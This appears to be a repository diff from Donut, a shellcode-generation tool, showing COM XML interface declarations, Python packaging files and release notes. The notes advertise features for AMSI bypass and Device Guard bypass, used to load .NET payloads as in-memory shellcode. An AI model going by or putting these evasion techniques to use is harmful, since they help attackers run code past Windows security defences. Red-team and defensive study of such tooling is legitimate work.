217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+4
-0
setup.cfg less more
0 [egg_info]
1 tag_build =
2 tag_date = 0
3
+32
-0
setup.py less more
0 from setuptools import Extension, setup
1
2 with open("README.md", "r") as fh:
3 long_description = fh.read()
4
5 module = Extension(
6 "donut",
7 include_dirs=[
8 'include'
9 ],
10 sources=[
11 'donut.c',
12 'hash.c',
13 'encrypt.c',
14 'payload/clib.c',
15 'donutmodule.c'
16 ]
17 )
18
19 setup(
20 name='donut-shellcode',
21 version='0.9.2',
22 description='Donut Python C extension',
23 long_description=long_description,
24 long_description_content_type="text/markdown",
25 url='https://github.com/TheWover/donut',
26 author='TheWover, Odzhan, byt3bl33d3r',
27 include_package_data=True,
28 zip_safe=True,
29 ext_modules=[module],
30 python_requires='>=3.0',
31 )
+16
-0
version-release-notes.txt less more
0 * v0.9.1:
1 * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
2 * Automatic detection of the CLR version required for .NET Assembly payloads.
3 * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
4 * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
5 * Bypass for Device Guard policy preventing execution of dynamically generated .NET code
6 * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
7 * v1.0:
8 * C# generator
9 * C# wrapper for our dynamic library
10 * Python generator
11 * Python wrapper for our dynamic library
12 * Better documentation for debugging, designing with, and integrating Donut.
13 * v1.1:
14 * Automatic unloading of Application Domains after the Assembly finishes executing.
15 * Support for HTTP proxies